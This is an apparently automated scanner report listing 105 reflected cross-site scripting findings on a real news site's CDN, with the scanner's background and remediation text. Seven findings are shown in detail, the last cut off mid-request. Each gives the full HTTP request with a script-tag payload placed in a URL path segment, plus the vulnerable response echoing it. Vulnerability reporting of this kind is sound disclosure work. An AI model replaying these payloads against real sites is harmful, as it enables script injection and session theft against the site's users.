Report generated by Hoyt LLC Research at Thu Nov 04 17:00:14 CDT 2010.


Cross Site Scripting Reports | Hoyt LLC Research

1. Cross-site scripting (reflected)

1.1. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 2]

1.2. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 3]

1.3. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 4]

1.4. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 5]

1.5. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 6]

1.6. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 7]

1.7. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 2]

1.8. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 3]

1.9. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 4]

1.10. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 5]

1.11. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 6]

1.12. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 7]

1.13. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 2]

1.14. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 3]

1.15. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 4]

1.16. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 5]

1.17. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 6]

1.18. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 7]

1.19. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 2]

1.20. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 3]

1.21. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 4]

1.22. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 5]

1.23. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 6]

1.24. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 7]

1.25. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 2]

1.26. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 3]

1.27. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 4]

1.28. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 5]

1.29. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 6]

1.30. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten_functions.js [REST URL parameter 7]

1.31. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 2]

1.32. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 3]

1.33. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 4]

1.34. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 5]

1.35. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 6]

1.36. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 7]

1.37. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 2]

1.38. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 3]

1.39. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 4]

1.40. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 5]

1.41. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 6]

1.42. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 7]

1.43. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 2]

1.44. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 3]

1.45. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 4]

1.46. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 5]

1.47. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 6]

1.48. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 7]

1.49. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 2]

1.50. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 3]

1.51. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 4]

1.52. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 5]

1.53. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 6]

1.54. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.js [REST URL parameter 7]

1.55. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 2]

1.56. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 3]

1.57. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 4]

1.58. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 5]

1.59. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 6]

1.60. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 7]

1.61. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 2]

1.62. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 3]

1.63. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 4]

1.64. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 5]

1.65. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 6]

1.66. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 2]

1.67. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 3]

1.68. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 4]

1.69. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 5]

1.70. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 6]

1.71. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 2]

1.72. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 3]

1.73. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 4]

1.74. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 5]

1.75. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 6]

1.76. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 2]

1.77. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 3]

1.78. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 4]

1.79. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 5]

1.80. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-drag-1.7.2.js [REST URL parameter 6]

1.81. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 2]

1.82. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 3]

1.83. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 4]

1.84. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 5]

1.85. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 6]

1.86. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 2]

1.87. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 3]

1.88. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 4]

1.89. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 5]

1.90. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js [REST URL parameter 6]

1.91. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 2]

1.92. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 3]

1.93. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 4]

1.94. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 5]

1.95. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js [REST URL parameter 6]

1.96. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 2]

1.97. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 3]

1.98. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 4]

1.99. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 5]

1.100. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.js [REST URL parameter 6]

1.101. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 2]

1.102. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 3]

1.103. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 4]

1.104. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 5]

1.105. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js [REST URL parameter 6]



1. Cross-site scripting (reflected)
There are 105 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1e2ed<script>alert(1)</script>5a04c6a8aa2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig1e2ed<script>alert(1)</script>5a04c6a8aa2/WebPortal/nypost/blocks/ads/ads.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:06 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig1e2ed<script>alert(1)</script>5a04c6a8aa2/WebPortal/nypost/blocks/ads/ads.js</p>
...[SNIP]...

1.2. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0d14<script>alert(1)</script>0133414670e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortalc0d14<script>alert(1)</script>0133414670e/nypost/blocks/ads/ads.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortalc0d14<script>alert(1)</script>0133414670e/nypost/blocks/ads/ads.js</p>
...[SNIP]...

1.3. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cdab2<script>alert(1)</script>21a84147a08 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostcdab2<script>alert(1)</script>21a84147a08/blocks/ads/ads.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostcdab2<script>alert(1)</script>21a84147a08/blocks/ads/ads.js</p>
...[SNIP]...

1.4. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cf0cd<script>alert(1)</script>c7eab316849 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blockscf0cd<script>alert(1)</script>c7eab316849/ads/ads.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blockscf0cd<script>alert(1)</script>c7eab316849/ads/ads.js</p>
...[SNIP]...

1.5. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7ef21<script>alert(1)</script>7e167754e7a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/ads7ef21<script>alert(1)</script>7e167754e7a/ads.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:37 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/ads7ef21<script>alert(1)</script>7e167754e7a/ads.js</p>
...[SNIP]...

1.6. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 2081c<script>alert(1)</script>11f89c5bbb0 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/ads/ads.js2081c<script>alert(1)</script>11f89c5bbb0 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 703
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:44 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/ads/ads.js2081c<script>alert(1)</script>11f89c5bbb0</p>
...[SNIP]...

1.7. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48f7f<script>alert(1)</script>d51368caf7e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig48f7f<script>alert(1)</script>d51368caf7e/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
